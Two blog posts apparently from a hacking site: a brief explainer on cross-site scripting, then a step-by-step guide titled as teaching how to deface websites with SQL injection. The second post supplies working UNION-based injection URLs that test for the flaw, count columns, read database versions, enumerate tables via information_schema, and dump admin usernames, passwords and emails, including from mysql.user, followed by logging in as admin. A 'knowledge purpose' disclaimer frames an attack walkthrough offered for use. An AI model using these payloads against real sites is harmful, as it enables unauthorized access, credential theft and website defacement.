Cross-Site Scripting (XSS) is a form of security vulnerability typically found in web applications. XSS Attack enables attackers to inject malicious scripts into the web pages viewed by other users. XSS attacks are one of the most prevalent forms of Web Attack, Accounting for an astonishing 12.75% of all web attacks.

What Is Cross-Site Scripting (XSS) ?

XSS is a security abbreviation for Cross Site Scripting. Prominent sites affected by XSS Attacks in the past include; Twitter, Facebook, MySpace & Youtube. In recent years, XSS vulnerabilities have become one of the most prevalent exploited security vulnerabilities. Approximately 70% of all web vulnerabilities are XSS related.

How Does An XSS Attack Work ?

Step #1 Hackers design a malicious script usually with the purpose of mining user data like usernames, passwords or billing details.

Step #2 Hackers inject the malicious script into a legitimate website, The script acts as a hidden layer to the user, similar to the concept behind an illicit ATM Skimmer.

Step #3 Hackers then receive feedback from the script, successfully harvesting user data.

Types Of XSS Attacks

1. Reflected Attack (Type-II XSS / Non-Persistent XSS): A reflected Attack is where the injected script is reflected off a web server as a request, such as a normal search result, error message or subsequent link. Reflected attacks target users differently, often masquerading in emails or hidden links. The browser executes the code because it came from a ‘trusted’ server.

2. Stored Attack (Type-I XSS / Persistent XSS): A stored Attack is the script that is injected and stored on the target servers, such as in a comment, database or forum. The script may then be executed while a legitimate user is using the site.

XSS Attack Statistics

XSS Attack Statistics

Mitigation

1. Blacklisting & Whitelisting: Two very basic techniques you can use to sanitize incoming data similar to that of parameterized inputs for migrating SQL Injection Attacks; Whitelisting uses a list of approved data, that can only be executed. Whitelisting is the most secure. Blacklisting uses a list of prohibited data to exclude from execution.

2. Application Security: At its core Barricade works like an early warning system against any attempts at breaching the security of your servers. By using attack mitigation products like Barricade you can be a step ahead of the game. Barricade quietly watches in the background and can identify any security threats. In the event, there is any serious activity Barricade notifies you and provide detailed steps needed to solve the situation.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope HACKAGON have provided a healthy knowledge about XSS Attack. So, stay secure and keep learning and if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


SQL Injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. So, Let’s Learn How To Deface Websites Using SQL Injection With HACKAGON.

last injection

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

What Is Website Defacement ??

Website defacement is an attack on a website that changes the visual appearance of the site or a web page. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own. Defacement is generally meant as a kind of electronic graffiti and, as other forms of vandalism, is also used to spread messages by politically motivated “Cyber Protesters” or “Hacktivists”.

Defacing a website simply means replacing the index.html file of a site by attacker’s own file. Now all the users who’ll open the website will see the page uploaded by the attacker.

Steps To Deface Websites Using SQL Injection:

1) Vulnerability Check:

To check a vulnerable website for SQL Injection, you need to find a page that looks like this –
http://www.website.com/news.php?id=1

Now to test if it’s vulnerable, we add a ‘ (quote) to the end of URL and that would look like –
http://www.website.com/news.php?id=1′

If the database is vulnerable, the page will spit out a MySQL error something similar to –
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”

And that means the Site is vulnerable to SQL injection but if the page loads as normal then the website is not vulnerable to SQL Injection.

2) Finding the number of columns: 

To find the number of columns in the database, we’ll use the statement ORDER BY which tells the database how to order the result. Well just incrementing the number until we get an error.

http://www.website.com/news.php?id=1 order by 1/*      <– No Error
http://www.website.com/news.php?id=1 order by 2/*      <– No Error
http://www.website.com/news.php?id=1 order by 3/*      <– No Error
http://www.website.com/news.php?id=1 order by 4/*      <– Error

We’ll get message like this: Unknown column ‘4’ in ‘order clause’ or something like that which means the database has 3 columns, as we got an error on 4.

3) Check for UNION function: 

We now are going to use the “UNION” command to find the vulnerable columns because with the union command we can select more data in one SQL statement. So we have –
http://www.website.com/news.php?id=1 union all select 1,2,3/* (As we’ve already found that the number of columns is 3 in the second step.)

If we see some numbers on the screen, i.e 1 or 2 or 3 then the UNION works.

4) Check for DataBase Version:

We now need to find the database version, name, and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
Or if these don’t work then try:
@@user
@@version
@@database

The URL would look like:
http://www.website.com/news.php?id=1 union all select 1,user(),version(),3/*

If you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …” Then what we need is convert() function (I didn’t see any website article covering this problem, So I must cover it.)

i.e. http://www.website.com/news.php?id=1 union all select 1,convert(@@version using latin1),3/*

Or with hex() and unhex()

i.e. http://www.website.com/news.php?id=1 union all select 1,unhex(hex(@@version)),3/*

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.

IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

5) Obtaining Table And Column Name:

In this step, We aim to list all the table names in the database. The “table_name” goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables. But in most of the cases, we must guess table and column name.

common table names are: user/s, admin/s, member/s, etc.

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc.

URL would be http://www.website.com/news.php?id=1 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good)

We know that table admin exists. . .Now to check column names –

http://www.website.com/news.php?id=1 union all select 1, username, 3 from admin/* (if you get an error, then try the other column name)

We get username displayed on the screen, the example would be the admin, or superadmin etc. . .Now to check if column password exists –
http://www.website.com/news.php?id=1 union all select 1, password, 3 from admin/* (if you get an error, then try the other column name)

We’ll see the password on the screen in Hash or Plain-Text format, it depends on how the database is set up i.e md5 hash, mysql hash, sha1, etc.

Now we must complete query as of our need. And for that, we can use concat() function (it joins the strings).
i.e. http://www.website.com/news.php?id=1 union all select 1, concat(username,0x3a,password),3 from admin/*

Note: Here, I used 0x3a, its hex value for colon)
(The another way is to use ASCII Value for that. Example: char(58))

http://www.website.com/news.php?id=1 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get displayed username: password on screen, i.e admin: admin or admin: HACKAGON

When you have this, you can login like admin or some superuser. If can’t then guess the right table name, you can always try mysql.user (Default). It has user password columns, So the URL would be
http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6) Incase of MySQL 5:

Uptil step 5 is for MySQL version < 5 (i.e 4.1.33, 4.1.12, etc.) But for MySQL 5 we need information_schema. It holds all tables and columns in the database. To get tables, we use table_name and information_schema.tables.
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables/*

Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables.
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
Note: Here, I put 0,1 (Get 1’s result starting from the 0th)

Now to view the second table, we’ll change limit 0,1 to limit 1,1
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

The second table is displayed. Now for the third table, we put limit 2,1
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing the limit until you get some useful table like db_admin, poll_user, auth, auth_user, etc.

To get the column names, the method will be the same. Where we use column_name and information_schema.columns.

The method will be as same as above. So the example would be –

http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is diplayed. The second one (we change limit 0,1 to limit 1,1)
i.e. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing the limit until you get something like username, user, login, password, pass, passwd, etc.

If you wanna display column names for specific table use this query (where clause). Let’s say that we found table users.
i.e. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*

Now we’ll get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note: This wouldn’t work if the magic quotes are ON.

Let’s say that we found columns user, pass, and email. Now complete the query to put them all together. For that we use concat(), As I used it earlier.
i.e. http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/

We’ll get here user:pass:email from table users. Example: admin:hash:xyz@abc.com

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.